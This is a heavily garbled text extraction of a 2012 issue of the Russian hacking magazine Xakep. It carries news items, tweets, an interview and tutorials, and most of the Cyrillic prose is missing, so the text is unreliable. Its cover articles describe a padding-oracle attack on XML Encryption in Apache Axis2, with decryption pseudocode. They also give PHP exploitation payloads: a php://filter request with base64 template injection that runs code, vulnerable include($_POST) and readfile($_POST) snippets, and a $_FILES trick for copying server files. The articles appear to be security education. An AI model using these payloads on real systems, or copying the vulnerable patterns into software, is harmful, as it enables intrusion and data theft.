Professional Documents
Culture Documents
x 01 (156) 2012
WWW.XAKEP.RU
01 (156) 2012
Lotus Domino Controller
ANDROID
: 230 .
XML
ENCRYPTION
XML-
.
,
024
PHP
036
PHONEGAP:
HTML5
064
018
156
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
Intro
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
PC_ZONE UNITS
MALWARE SYN/ACK
UNIXOID
PR-
xakep.ru
step (step@real.xakep.ru)
(magg@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(po@kumekay.com)
(grigorieva@glc.ru)
(xa@real.xakep.ru)
DVD
Unix-
Security-
ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)
ART
-
(alik@glc.ru)
: . : .
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906
:
, . , :
100%. ,
250 ,
. ? , , :
,
. .
. :
1-3 ,
. ,
: ,
. ,
.
, ,
, .
, .
, : .
,
, , .
:
115 !
shop.glc.ru/xakep.
, ,
. :
!
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
01/156/ 2012
TECHNOLOGY
(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012
001
Content
004
HEADER
004
011
MEGANEWS
hacker tweets
-
SIRI
016
017
8 Dropbox AdWords
Proof-of-concept
XSS- 100
COVERSTORY
030
,
Adobe
COVERSTORY
COVERSTORY
018
024
XML
Encryption
XML
PHP
112
122
PCZONE
036
042
046
PhoneGap: HTML5
Windows-
Windows-
Windows-?
UNIXOID
102
107
112
117
050
054
060
064
068
072
Easy-Hack
MD5
- SpyEye
Lotus,
Lotus Domino Controller
X-Tools
SYN/ACK
118
122
NAS
5- 6- NAS-
Silicon
Power SP060GBSSDV30S25
PHREAKING
MALWARE
080
084
Win32/Duqu: Stuxnet
: bootkit test
BitDefender, ESET NOD32, F-Secure, Outpost Security,
Rising
126
132
094
098
.NET-
.NET Framework
,
-
Loop
,
136
139
142
088
FERRUM
130
074
Linux
!
tcpdump
Android-
- Ubuntu 11.10
Oneiric Ocelot
144
FAQ UNITED
FAQ
8.5
WWW2
web-
2012
NY2k+12
MEGANEWS
SIRI
UBUNTU
SIRI
iPhone 4S
Applidium Siri,
iOS 5. ,
. ,
Siri
. -,
Android, Siri iPad.
Applidium: applidium.com/en/news/
cracking_siri.
:
iPhone 4S
,
Speex. Siri
iPhone 4S.
\,
. ,
,
, , .
. iPhone
Apple. ,
.
Applidium
,
Siri.
,
,
Siri.
WINDOWS XP
.
,
.
004
APPLE
. ,
,
.
! comScore,
50,81
.
UBUNTU
(
Canonical, Debian,
,
Ubuntu) , Ubuntu
, .
Canonical ,
, Windows 8, , ARM-.
, . ,
. ,
Ubuntu 14.04, 2014 . ,
,
.
Canonical
Ubuntu 12.04,
2012 . , LTS-
( ),
,
.
(CHRONOPAY)
,
DDOS- (Assist),
.
, STEAM .
, ,
Steam.
01 /156/ 2012
POLAROID !
DNS
,
, DNS-.
, ,
.
DNS-
Hotmail, Gmail, Google, Microsoft
, Uol, Terra Globo. , , , google.com,
IP- Google,
-. . ,
Google
Google Defender, .
, ,
27- ,
DNS-
, DNS-.
, ,
Ghost Click.
- ,
DNS Changer. Mac OS
X Windows DNS.
IP- 15
! , , .
100 , 500
.
( ), 14 ,
. - ( - )
,
.
, , DNS-
Internet Systems Consortium.
,
Rove Digital. , .
, .
,
, .
EstDomains , , .
ICANN
2008, ,
.
. 22
.
85 .
2008
Polaroid ,
11-
.
,
Polaroid
, 11-
.
Polaroid
: Z340
Instant Digital Camera. ZINK
Zero Ink Printing,
. ,
, .
,
. , ,
,
. 14 .
2,7"
SD.
( 43 ) F/3,2.
( 1280 720 ). Polaroid Z340
76 102 , $20 30
. - ,
, , 25 .
, Polaroid. Z340 Instant Digital Camera $300.
AVIRA
AESCRIPT.DLL
006
01 /156/ 2012
07
MEGANEWS
!
, WI-FI,
MYBB
MyBB.
,
MyBB 1.6.4.
. ,
PHP, .
,
,
.
, ,
,
.
, CMS,
, .
, MyBB 1.6.4,
6 ,
. ,
.
.
,
.
(CDN).
, , ,
. , ,
. -, ,
10 ,
/GPS. ,
, , , , 802.11.
-,
. , ,
,
( 100 ), 802.11, .
, .
, ,
.
, - ,
.
. , - ,
.
iPhone 4S,
,
,
.
Apple
- :).
008
,
GOOGLE! , Microsoft.
Bing
Firefox.
38
Interfilm.ru
Puzkarapuz.ru.
13 .
01 /156/ 2012
>> coding
MEGANEWS
,
.
YouTube :
Anonymous
(Zetas)
. , ,
, ,
. , 26 2011
- . ,
- .
-.
Anonymous ,
,
. ,
,
, -
, ,
. , OpCartel (
). , , ,
,
. , ,
,
OpCartel .
.
.
, , , , .
.
.onion Hidden Wiki,
. ,
. -
,
Freedom Hosting. ...
: Freedom Hosting,
40 ,
Anonymous . ,
,
- 20006000
.
38
.
IT .
,
010
01 /156/ 2012
(@asintsov)
#hacker tweets
@EdiStrosar:
,
(
).
@ILLUMlNATI:
@RuCTFE:
,
.
#RuCTFE
0ldEur0pe RWTH, ,
.
t.co/lUlI94Ko.
:
@WeldPond:
@jkouns:
. Google-
.
Google,
OllyDbg IDA Pro
_noRE.exe .
:
@mikko:
IP-: http://49.2;
http://96.4; http://71.3;
http://96.99.
...
-. :)
, Google
Wi-Fi,
_nomap. :)
@insit0r:
0day BIND.
@Rogunix:
Microsoft/MSRC.
!
Google. ++.
DNS- BIND,
DoS 0day.
Shodan ,
Siemens Simatic.
t.co/L1QDb3cq.
:
. SCADA
. SCADA- .
EMET,
, , . !
01 /156/ 2012
@Stephenwest:
How to do a pentest:
1. Draw line with pen.
2. Check line.
3. If visible, pen works.
4. If no line, pen does not work.
:
- .
pentest?
1. (pen) .
2. .
3. , , .
4. , , .
@WeldPond:
@fjserna:
CTF .
@csoghoian:
Chrome silentlyInstall()
. , FBI .
t.co/5EhY8AUC.
@jduck1337:
: bash: ./:
.
@j00ru:
@mikko:
,
: .
#worstpassword
Windows (NT/2000/
XP/2003/Vista/2008/7/8).
: t.co/oBHiB76O.
:
, . ? :)
011
( 926 ), ,
.
MEGANEWS
Nitro,
,
.
.
Stuxnet, , - ,
, .
, ,
Symantec. ,
Nitro,
,
. 29 19 ,
(,
). ,
.
, .
( Poisonlvy).
, .
Symantec ,
. Nitro :
, .
.
,
.
012
SUP
.
,
.
GOOGLE,
Android,
18,7%,
Opera Mini,
13,1%.
,
!
. , , .
, ? ,
, . ,
.
VideoGhost,
.
,
, (
- 2 ). VideoGhost
,
USB-. USB- -, .
USB-,
VideoGhost.
VGA, DVI HDMI,
$200.
FACEBOOK.
Trusted Friends
.
XXX.
ICANN
.
01 /156/ 2012
BITCOIN
PC ANDROID'
,
BITCOIN
BitCoin
.
,
, . ,
Mt Gox, BitCoin,
, . , BitCoin
, ,
,
.
Intego,
,
DevilRobber, BitCoin.
.
,
, ,
, ,
BitCoin, ,
.
DevilRobber Mac OS X,
.
The Pirate Bay . ,
Graphic Converter Mac OS X.
,
. , DevilRobber
BitCoin-, .
Mac. DevilRobber ,
Safari Vidalia
Firefox, TOR.
, DevilRobber , ,
.
BitCoin
.
Microsoft , . ,
BitCoin.
: 1
2, , 50 , 1 .
, , .
,
, ,
BitCoin. - .
, .
, .
, .
, BitCoin, :
, ,
- .
FXI ,
The Cotton
Candy
$200,
2012 .
, Windows 8
.
, GOOGLE ?
SSID
_NOMAP,
GOOGLE
01 /156/ 2012
013
MEGANEWS
ADOBE
FLEX
FLASH
,
,
, !
, , .
, , , . iSpy 100%.
, ,
iPhone Android
(magnified keys). iSpy
, ,
- !
,
.
,
60 .
90 % . ,
. , ,
.
DSLR-
12 . iSpy magnified key -
.
Adobe Flash
750 ( 7
% )
.
dobe
Flash Player. Flash
, Adobe AIR
. Android PlayBook,
. Flash Player
HTML5.
, Flash. , ,
Apple, , - Flash Player iOS.
, Flash Player Apple iOS , . Adobe Flash
Apple.
,
Flex SDK. Flex 4.6 SDK, 29 , open source.
.
DARPA
Shredder Challenge
. , .
50 .
014
AMAZON
.
, 2012
.
GOOGLE
42 47
.
01 /156/ 2012
500 Wikimedia.
IPHONE
iPhone Dev-Team
iPhone 4S.
,
.
,
,
.
iPhone 4S ,
. Chronic Dev Team iPhone
. , , ,
iPhone,
AT&T, .
, , ,
, iPhone 4S, iPhone
: iPhone 4 iPhone 3GS, . ,
,
. , ,
. : SIM-
AT&T, ,
, . AT&T
( , ,
, ).
, youtu.be/gofpelTXI5U. :
AT&T (611)
;
;
SIM- AT&T T-Mobile;
, Wi-Fi (
,
);
,
iPhone ;
;
EDGE
E;
2030 ;
iPhone,
;
,
;
SIM-,
;
SIM- T-Mobile
.
. , iPhone T-Mobile,
.
MCAFEE:
75
01 /156/ 2012
015
HEADER
Proof-of-Concept
XSS-
100
, PoC.
, SQL-,
, ,
. , , sqlmap, SQLi
. PoC ,
XSS- . .
Damn Small XSS Scanner (DSXS).
XSS
. Cross-site scripting (XSS)
, JS-.
.
XSS- .
- , ,
,
HTTP-.
.
,
XSS-.
XSS- .
,
-
.
HTML-
GET/POST-.
(
),
.
,
,
XSS-. ,
-
. ,
. ,
HTML- <script>..</script> (
),
JavaScript-. ,
,
HTML- <a href="...">,
> JS-, <script>...</script>.
DSXS
XSS
zero.webappsecurity.com
016
, XSS . ? Python,
01 /156/ 2012
HEADER
10 DROPBOX
ADWORDS
10 2
Dropbox , , ][,
.
2 ,
50 ,
. $99,00 . ,
,
250 . ,
10 , ,
- . , , Dropbox,
MAC-. , ,
(, bit.ly/und69i). ,
, Dropbox - , , . ,
,
10 , Dropbox
. AdWords !
?
,
(bit.ly/rxNKyB).
,
Dropbox-.
, .
? , ,
. . ,
AdWords,
.
? . ,
! , Google, 1000 .
. . bit.
ly/rAEsg1 $75
AdWords, , . :) , e-mail (
- ), (
- about.me), .
e-mail. ( ).
.
( ):
1. .
2. (, Dropbox).
3. ,
(, , ,
, ).
3. : , 600
.
. ,
.
: dropbox, free online storage,
online backup free, online backup, online backup data, dropbox space.
, ,
Google. URL ,
Dropbox Referall Status (,
http://db.tt/UfxuF8m). , .
, , .
,
. ,
CPC (Cost-Per-Click). , .
, ,
. :)
? -,
Dropbox. -, .
-, AdWords, , , (
Google). . :) z
?
? , ,
Google AdWords (adwords.google.com).
.
( ,
, ),
01 /156/ 2012
250 Dropbox
017
COVERSTORY
XML
Encryption
XML-
BEAST Padding Oracle Attack
.NET Framework,
XML
Encryption,
XML-.
CBC
.
018
WWW
www.w3.org/TR/
xmlenc-core/
XML Encryption
W3C.
bit.ly/qMupEv
,
XML
Encryption.
XML ENCRYPTION
XML Encryption, W3C 2002
, XML
Framework ( .NET, Apache Axis2,
JBOSS . .).
- , Microsoft Red Hat.
XML Encryption ,
XML- , ,
XML-
. , .
, AES 3DES CBC. AES (
, CBC).
01 /156/ 2012
XML Encryption
,
( 16 , 128 )
. ,
, CBC.
.
(IV),
XOR,
.
,
:
//
C[0] = AES_ENC(k, IV xor M[0]);
C[i] = AES_ENC(k, C[i-1] xor M[i]);
//
M[0] = AES_DEC(k, C[0]) xor IV;
M[i] = AES_DEC(k, C[i]) xor C[i-1];
k , , , IV
().
CBC,
.
, , :
,
. ,
, 12
0x05. ( 16 ),
, 15
, 16- 0x10.
, XML Encryption.
CBC ( )
01 /156/ 2012
, BEAST Padding
Oracle Attack.
. .
CBC ,
,
XOR IV
MSK, (IV xor MSK, C[0]) M[0] xor MSK. ,
.
,
MSK,
,
. ,
.
,
, . XML Encryption
, .
, , , ASCII. ASCII .
, NULL ( ),
( B). , , B,
. ,
,
. ,
, 16 ,
true, M[0] = AES_DEC_
CBC(k, (IV, C[0])) NULL, false
.
, , .
:
1. IV1, (IV1, C[0]) .
nIV, (nIV, C[0]). true,
IV1 = nIV, false .
019
COVERSTORY
WS-SECURITY
WS-Security
SOAP,
-. WS-Security XML Encryption XML
Signature.
,
23 , , ,
.
2.
(, AES_DEC ,
). :
msk = 0
repeat
,
3. X[0] ,
M[0].
XOR X[0]
IV.
. .
:
Input:
C=(IV1, C[0]), j
Output:
j- X[j]
X = AES_DEC(k, C[0])
. j-
, ,
j-
. , ? : CBC.
(
):
AES_DEC_CBC(k, (IV2, C[0])) = IV2 xor AES_DEC(k, C[0]) =
IV2 xor X[0].
XML Encryption
020
01 /156/ 2012
XML Encryption
,
<EncryptionMethod>.
,
XML-.
, XML-, . ? :-)
XML Encryption XML- ( XML),
.
Type <EncryptedData>. Encrypted Element , XML-
. Encrypted Content ,
, , . . Encrypted Text Content,
Encrypted Content,
,
. , Type . ,
XML Framework .
. XML Encryption UTF-8,
,
.
UTF-8 , ,
(line feed)
(carriage return). ,
ASCII UTF-8.
, ASCII
128 ( 4). ,
,
.
AXIS2
-
-.
Apache Axis2 Framework,
Rampart WS-Security.
XML Encryption XML
Signature SOAP.
Axis2
Framework, (message flow). (message flow)
,
SOAP- ( ),
. SOAP-
, Message
Receiver, , ,
Service .
Axis2
: Transport, Security Dispatch. Security,
XML SIGNATURE
XML Signature W3C,
XML.
01 /156/ 2012
?
Provable Security,
. ,
,
,
. . ,
(, , -,
, .).
-,
,
, . Axis2,
, -.
Padding Oracle Attack,
(-, ASP.NET),
.net.
, .
,
XML SOAP-.
Dispatch. Message
Receiver, message flow
SOAP ,
.
,
Axis2. :-)
AXIS2
-,
Axis2. ,
,
true false .
security fault. security fault
:
1.
. , ,
,
? ,
0x01 0x10,
.
2.
.
,
ASCII 0x00 0x1F ( 0x09,
0x0A, 0x0D , ).
XML- , &
(0x26) < >.
.
,
ASCII (
). A
XML & <,
B .
021
COVERSTORY
. ,
, , , CBC, 16-
, true
false. , SOAP, . ,
true, SOAP(AES_ENC_CBC(k, (IV, C)))
security fault, false .
, security fault,
, M XML-:
PAD(M) == (IV xor AES_DEC(k, C))
:
1. M, XML- <a>,
</a>.
2. M &,
escape-,
>.
3. M B.
security fault, ,
.
, , . .
C=(IV, C[1], ... , C[d]),
.
, CBC
[i] C[i-1].
,
ASCII ( UTF-8). ,
,
,
B ,
0x01 (
).
-
-
.
W3C web-service ,
machineto-machine-.
-
.
WSDL (Web Services Description Language), XML. -
,
RPC (Remote procedure calls,
), SOA (Service-oriented architecture,
) REST (Representational state transfer).
GET, POST, PUT, DELETE . .
HTTP, .
022
. (FindIV)
. = (IV, C[1], ... , C[d])
i,
C=(iv, C[i]).
, .
(FindXbyte) (
FindIV) j- X[i][j] X[i] = AES_DEC(k, C[i]). ,
.
Input: C=(C[0] = IV, C[1], ..., C[d])
Output: M=(M[1], ..., M[d])
for i = 1 to d do
iv = FindIV(C, i)
for j = 1 to 16
X[i][j] = FindXbyte(C[i], iv, j)
end for
X[i] = (X[i][1], ..., X[i][16])
M[i] = X[i] xor C[i-1]
end for
return (M[1], ..., M[d])
.
, M
CBC ( ,
). : FindIV FindXbyte.
FINDIV FINDXBYTE
FindIV , , ,
- . , .
, , ,
, , : <
IV,
0x01.
,
FindXbyte. , - , , ,
.
, , .
01 /156/ 2012
XML Encryption
ASCII
, .
( ,
)
( ). , , XML Schem
(XML-) . , ,
, , ,
. ,
,
.
( ),
.
,
,
XML Signature.
, XML Signature
Wrapping, , / MAC. ,
.
01 /156/ 2012
. -,
-, -,
.
-, , . ,
, ,
CBC, ,
(, ISO/IEC
19772:2009),
XML Encryption. , ,
OSI (, XML Encryption SSL/TLS,
BEAST).
,
, ,
, epic fail.
, XML Encryption
, side-channel,
. ,
, -
, .
Juraj Somorovsky Tibor Jager,
, . z
023
COVERSTORY
C
OVERSTORY
INFO
$_FILES
,
.
PHP
PHP
.
fopen, copy, file_get_
contents . .
,
,
.
024
WWW
bit.ly/sfDcys
LightningTemplate.
bit.ly/tTtvWV
LightningTemplate.
bit.ly/mdrdqf
,
File path
injection.
pastebin.com/1edSuSVN
File path
injection.
,
,
PHP 4.3
. PHP ( , . .) .
.
PHP ,
, .
,
:
print_r(stream_get_filters());
, . stream_filter_append/
bit.ly/g6ztD3
,
$_FILES.
DVD
.
phpBB3
01 /156/ 2012
stream_filter_prepend php://filter.
, ,
.
:
if($closing) {
$consumed += strlen($this->_data);
$str = nl2br($this->_data);
$this->bucket->data = $str;
$this->bucket->datalen = strlen($this->_data);
,
POST, Base64 :
readfile("php://filter/read=convert.base64-encode/
resource=php://input");
, PHP
, . , ftp-,
gz-, :
copy('compress.zlib://ftp://user:pass@ftphost.com:21/
path/file.dat.gz', '/local/copy/of/file.dat');
php://filter
-. ,
include ($_POST['inc']);
, PHP -
. !
, , ,
. -
. , nl2br. . ,
filter (
).
, .
$this->_data:
private $_data;
.........................
while($bucket = stream_bucket_make_writeable($in)) {
$this->_data .= $bucket->data;
$this->bucket = $bucket;
$consumed = 0;
}
, $closing
TRUE. :
01 /156/ 2012
Lightning Template
025
COVERSTORY
if(!empty($this->bucket->data))
stream_bucket_append($out, $this->bucket);
return PSFS_PASS_ON;
}
,
PSFS_PASS_ON. ,
. .
:
stream_filter_register('convert.nl2br_string',
'nl2br_filter');
, .
, , , .
Google Code Search.
stream_filter_register.
Lightning-Template (
), . ,
sample.html:
<html><head>
<meta charset="utf-8" />
<title>{{ title }}</title>
</head> </html>
include ("./LightningTemplate.php");
$lt = new LightningTemplate('./sample.html');
$lt->title = 'My Title';
echo $lt;
HTML-:
<html><head>
<meta charset="utf-8" />
<title>My Title</title>
</head></html>
,
HTML-. ,
include,
.
,
PHP-,
. ,
,
HTML-. :
public function filter($in, $out, &$consumed, $closing) {
while ($bucket = stream_bucket_make_writeable($in)) {
$patterns = array(
...
'/\{%\s+if\s+(.+?)\s+%\}/e',
...
);
$replacements = array(
...
"'<?php if ('. \$this->condition($1). '): ?>'",
...
);
$bucket->data = preg_replace($patterns,
$replacements, $bucket->data);
, "'<?php if,
. ,
. , ,
preg_replace
e. ,
:
{% if print_r(ini_get_all()) %}
PHP-. ,
, . , :
include ("./MYLightningTemplate.php");
$f = $_POST["file"];
readfile ($f);
, .
POST- file:
file=php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
026
,
, , ,
01 /156/ 2012
-----------------2421143106617
php_user_filter.
: filter, onCreate, onClose.
filter, :
1. $in , ,
, .
2. $out , ,
.
3. $consumed , ,
, .
4. $closing , ,
TRUE, .
filter
:
1. PSFS_PASS_ON
.
2. PSFS_FEED_ME ,
$out .
3. PSFS_ERR_FATAL (default) .
onCreate/onClose ,
. (,
), onCreate,
. onCreate FALSE
TRUE . onClose
( ).
,
stream_filter_register.
. , ,
PHP.
FILE UPLOAD
move_uploaded_file, copy.
, , . .
, -. ,
, ,
.
,
HTML-, :
<form action=upload.php method=post
enctype=multipart/form-data>
<input type=file name=uploadfile>
<input type=submit value=Upload>
</form>
Upload, POST, Content-Type
:
Content-Type: multipart/form-data; boundary=
01 /156/ 2012
POST- :
-----------------------------2421143106617
Content-Disposition: form-data; name="uploadfile";
filename="hello.txt"
Content-Type: text/plain
,
hello.txt, <?php echo 'Hello!!!'; ?>.
PHP- ,
PHP
phpseUm44, hello.txt.
,
( PHP
).
$_FILES :
Array (
[uploadfile] => Array (
[name] => hello.txt
[type] => text/plain
[tmp_name] => /tmp/phpseUm44
[error] => 0
[size] => 33
)
)
, $_FILES[uploadfile][type]
Content-Type, .
, -,
PHP, :
$_FILES["file"]["type"] == "image/gif"
,
,
.
getimagesize(). , ,
, EXIF-
, .
,
. , -
pic.php.myext PHP-.
,
,
.
PHP, $_FILES.
, ,
.
bugs.php.net ,
, - .
:) ,
/ ,
$_FILES[uploadfile]
[name]. , , -. Unix-
027
COVERSTORY
-
. Windows- .
.
. $_FILES.
Qwazar rdot.org.
BlackFan, , ,
.
. , ,
copy:
$_FILES :
foreach ($_FILES["file"]["tmp_name"] as $key => $name)
{
echo "Size:".$_FILES["file"]["size"][$key]."<br/>\r\n";
echo "tmp name:".
$_FILES["file"]["tmp_name"][$key]."<br/>\r\n";
$_FILES["file"]["tmp_name"]["[name"]
copy :
$_FILES["file"]["tmp_name"][$key]
if($_FILES["file"]["size"][$key]>0 &&
$_FILES["file"]["size"][$key]<1024)
{
echo "Ok<br/>\r\n";
copy($_FILES["file"]["tmp_name"][$key],'test.txt');
}
}
, !
:
,
$_FILES ( ,
copy). , .
( upload.php), HTML-, secret.
php, , upload.php,
:
1. secret.php,
(, , <?php ?>).
2. , 1.
1.
,
:
$_FILES["file"]["size"][$key]>0
file[tmp_name][ secret.php,
1. ,
test.txt.
secret.php, txt,
, .
, ,
Content-Type (, ).
,
test.txt. !
,
move_uploaded_file copy.
. (, , , ) imagecreatefrom*/image*.
, , ,
. ,
$img = imagecreatefromjpeg($_FILES["filename"]["tmp_name"]);
imagejpeg($img, "uploads/".$_FILES["filename"]["name"]);
onCreate
028
JPEG,
EXIF- .
, -
. , ,
01 /156/ 2012
. ,
,
.
, imagecreatefrom* , , !
, ,
, . ,
base64_encode ,
, , :
$jpegimage = imagecreatefromjpeg(
"data://image/jpeg;base64," . base64_encode(
$sql_result_array['imagedata']));
imagejpeg($jpegimage);
,
, .
,
,
. , ,
.
, -,
, , copy,
imagecreatefrom*/image*, :
2009 PHP ,
.
, GPC-
(), . [ ( ).
PHP
. , HTML:
<form action=>
<input name="goodvar .[">
<input name="goodarray[foo]">
<input name="badvar[ . [">
<input type=submit>
</form>
index.php :
<?php
print_r($_GET);
?>
:
Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
}
[badvar_____] =>
1.jpg c ,
, ,
POST- Content-Type:
php://filter/read%3dconvert.lightning_template_filter/
resource%3d
data://text/plain%3bbase64,eyUgaWYgcHJpbnRfcihpbmlfZ2V0X2
FsbCgpKSAlfQ
Array
(
[goodvar___] =>
[goodarray] => Array
(
[foo] =>
)
[badvar_ . [] =>
)
, ! , ,
, imagecreatefromjpeg. ,
,
.
, .
$_FILES,
.
PHP
01 /156/ 2012
PHP.
, .
, - ,
, , . z
029
COVER STORY
ADOBE
.
.
Elcomsof t.
vanced eBook Processor,
Ad
1
- 200 Defcon.
030
01 /156/ 2012
,
IT, , ?
(
. . . ][), , 6.
100 . . 20
.
. ,
- ... , ,
- ,
.
.
. ,
- , . ,
, - ...
,
.
, , .
4,5 ,
6 .
91- .
, , .
,
. , .
E
01 /156/ 2012
031
COVER STORY
, ,
. , , , :
.
, ,
, .
,
, ,
, .
,
,
.
.
, .
, ,
( 97- )
. ,
,
,
IT. .
, ,
, 80 %.
Elcomsoft, .
, , ,
, . :
, .
.
,
... .
ELCOMSOFT
?
,
A .
password recovery, ,
. , ,
.
.
, .
, EFS
Recovery.
,
Active directory.
computer
forensics. ,
,
,
.
,
,
,
. ,
,
.
APPLE
,
,
? ADOBE
.
, ,
computer forensics.
, ,
. , ... Apple
,
. , ,
.
PDF
ELCOMSOFT ?
, pdf .
. : , ,
.
. ,
.
ADVANCED EBOOK
PROCESSOR, -
2001 DEFCON?
, . ,
,
pdf-, .
2001 .
,
,
. ,
, .
.
Defcon.
, ,
12 20 .
,
, ,
Adobe.
.
Defcon,
Advanced eBook Processor,
. ,
, ,
.
.
, Defcon 2001
, .
, .
.
, .
, . , ,
,
, .
.
, ,
ELCOMSOFT.
.
Access, . ,
... .
, ,
. -
,
032
. :)
, ,
.
-
, ,
. 90-
- ,
.
Elcomsoft, .
.
, .
, , , ...
A ,
Apple, iOS ( ,
iPhone 4S iPad2).
, .
, ,
? :)
01 /156/ 2012
. ,
.
, .
, , ,
,
, .
- .
,
? ?
.
,
,
21 .
,
.
,
. 11
-,
, .
,
.
, ,
, ... ,
. :) ,
, -.
,
. , ,
.
.
, ... , .
, ... ,
A
, .
Spot the fed ( ).
(, ),
,
, -
.
,
, ,
- , .
. ,
, , ,
, .
, .
Q
,
,
.
01 /156/ 2012
, ,
. ,
,
. ,
, , .
.
.
-.
. , ,
.
: ,
.
-, 11 . .
,
,
, ,
, , .
.
, , . :
, . ,
, .
,
ADOBE
?
, , -,
Adobe .
,
Adobe, . Adobe
, , . , : ,
, , . ,
.
, ,
?
, ,
Elcomsoft. ,
.
. .
, ,
.
.
033
COVER STORY
, .
,
, , , ,
. ,
. ,
.
, ( -)
50
, Elcomsoft.
, ,
, .
, .
,
.
,
, . .
,
, -
, .
. ,
2001 ,
6 , 2002
. ,
( ),
:
, ,
,
.
deposition
( )
. ,
: -
?.
, :
.
, Elcomsoft
.
. 2001
,
.
, ,
2002.
?
Elcomsoft
A ,
Public
Interest Parole. ,
, 17
Elcomsoft
.
. ,
,
. .
Q
034
? ,
, ADOBE
- ?
.
DMCA.
, .
, -
,
.
, .
,
,
.
-
, ?
?
,
. .
.
,
.
?
, ...
. , .
, , -
,
.
, .
, ,
...
, , ,
. ,
,
,
.
9 .
CONFIDENCE 2.0
CANON.
?
,
(Canon).
, Canon 300D, ,
, Canon 350D.
, Canon
, ,
, , . Canon 30D,
.
, .
Canon. ,
Magic Lantern,
Canon
,
.
Canon Hackers Developers Kit,
,
.
,
Canon ,
,
.
CONFidence 2.0. Nikon
. (usb-)
.
, , . ,
. Nikon
.
510
,
,
?
,
, Practical
cryptography
. , ,
, . ... ,
, .
,
. , .
, , .
?
,
?
, .
,
.
,
.
,
.
, . ,
, , ,
.
,
1 % ,
. ,
. ,
, IT,
- : .
,
.
, ,
,
. z
01 /156/ 2012
Preview
30 .
.
68
,
:
.
.
.
,
Lotus Domino
Controller
.
, ,
IBM
.
PC ZONE
36
HTML5
Android iOS,
? .
30 .
74
500 ,
.
.
01 /156/ 2012
46
?
,
, .
64
?
.
,
.
MALWARE
80
DUQU
,
Stuxnet.
84
BOOTKIT!
, MBR, ,
5 .
035
PC ZONE
(http://twitter.com/azproduction)
PhoneGap:
HTML5
,
,
.
todo list Android
iOS, ,
.
Objective-C Java
,
, PhoneGap.
,
Windows 8, , , ,
HTML5. , , ,
, .
,
HTML, JavaScript
CSS!, PhoneGap.
: iOS, Android,
Windows Phone, Blackberry, WebOS, Symbian Bada.
(, Objective-C iOS), API
. , , HTML5
PhoneGap API.
HTML-, , ! API
,
: , , (
), , , ( ), . . ,
- .
jQuery Mobile Sencha,
,
( ).
,
, .
.
iOS
036
iOS -,
AppStore,
:). : , , , , Android. ,
,
01 /156/ 2012
PhoneGap: HTML5
, jQuery Mobile.
JS-
(
) . ,
,
! JQuery Mobile
(jquerymobile.com/download)
, :
images/ (
jq-mobile);
index.css;
index.html;
index.js;
jquery.js;
jquery.mobile.min.css;
jquery.mobile.min.js.
, .
index.html. , .
, . iOS .
.
,
, : , . AppStore
, , . ,
. ,
.
, ,
. : -, , PhoneGap iOS.
, .
JS- jQuery c jQuery Mobile (jquerymobile.com),
Google Maps v3.
: .
.
, ( ). ,
. API.
,
. , . localStorage.
01 /156/ 2012
<div data-role="page" data-dom-cache="true"
class="page-map" id="index">
<div data-role="header">
<h1></h1>
<a href="#points" class="ui-btn-right" id="menu-points"
data-transition="pop"></a>
</div>
<div data-role="content">
<div id="map-canvas">
<!-- -->
</div>
</div>
</div>
data-dom-cache="true" ,
.
data-transition="pop",
. ,
jQuery Mobile, (bit.ly/vtXX3M).
PHONEGAP
,
PhoneGap
. !
.
PhoneGap Build (build.phonegap.com) .
. ,
, .
-
PhoneGap,
. (github.com/
phonegap/phonegap-plugins),
iPhone, Android, Palm, BlackBerry. iOS
20 : BarcodeScanner ( -), AdPlugin ( iAd), NativeControls ( iOS
) .
037
PC ZONE
:
<div data-role="page" data-dom-cache="true"
class="page-pints" id="points">
<div data-role="header">
<!-- -->
<a href="#" data-theme="b" data-icon="delete"
id="delete-all"> </a>
<h1></h1>
<!-- -->
<a href="#index" class="ui-btn-right"
data-transition="pop" data-direction="reverse">
</a>
</div>
<div>
<!-- -->
<ul id="list" data-role="listview"
data-inset="true" data-split-icon="delete">
</ul>
</div>
</div>
data-transition=pop,
data-direction=reverse,
.
. , .
,
API Google Maps, :
var latLng = new gm.LatLng(
this.options.lat, this.options.lng);
this.map = new gm.Map(element, {
zoom: this.options.zoom, //
center: latLng, //
mapTypeId: gm.MapTypeId.ROADMAP, //
disableDoubleClickZoom: true,
// /
disableDefaultUI: true
//
});
Gm , Google
Maps.
. :
this.person = new gm.Marker({
map: this.map,
icon: new gm.MarkerImage(PERSON_SPRITE_URL,
new gm.Size(48, 48))
});
PERSON_SPRITE_URL
Google-. maps.gstatic.
com/mapfiles/cb/mod_cb_scout/cb_scout_sprite_api_003.png. , , ,
, click:
gm.event.addListener(this.map, 'click', function (event) {
self.requestMessage(function (err, message) {
// , ,
if (err) return;
//
038
ExternalHosts
//
self.addPoint(event.latLng,
self.options.radius, message);
self.updatePointsList(); //
});
}, false);
.
. Geolocation API
(, ):
if (navigator.geolocation) {
// ,
function gpsSuccess(pos) {
var lat, lng;
if (pos.coords) {
lat = pos.coords.latitude;
lng = pos.coords.longitude;
} else {
lat = pos.latitude;
lng = pos.longitude;
}
self.movePerson(new gm.LatLng(lat, lng));
//
}
//
//
window.setInterval(function () {
//
navigator.geolocation.getCurrentPosition(gpsSuccess,
$.noop, {
enableHighAccuracy: true,
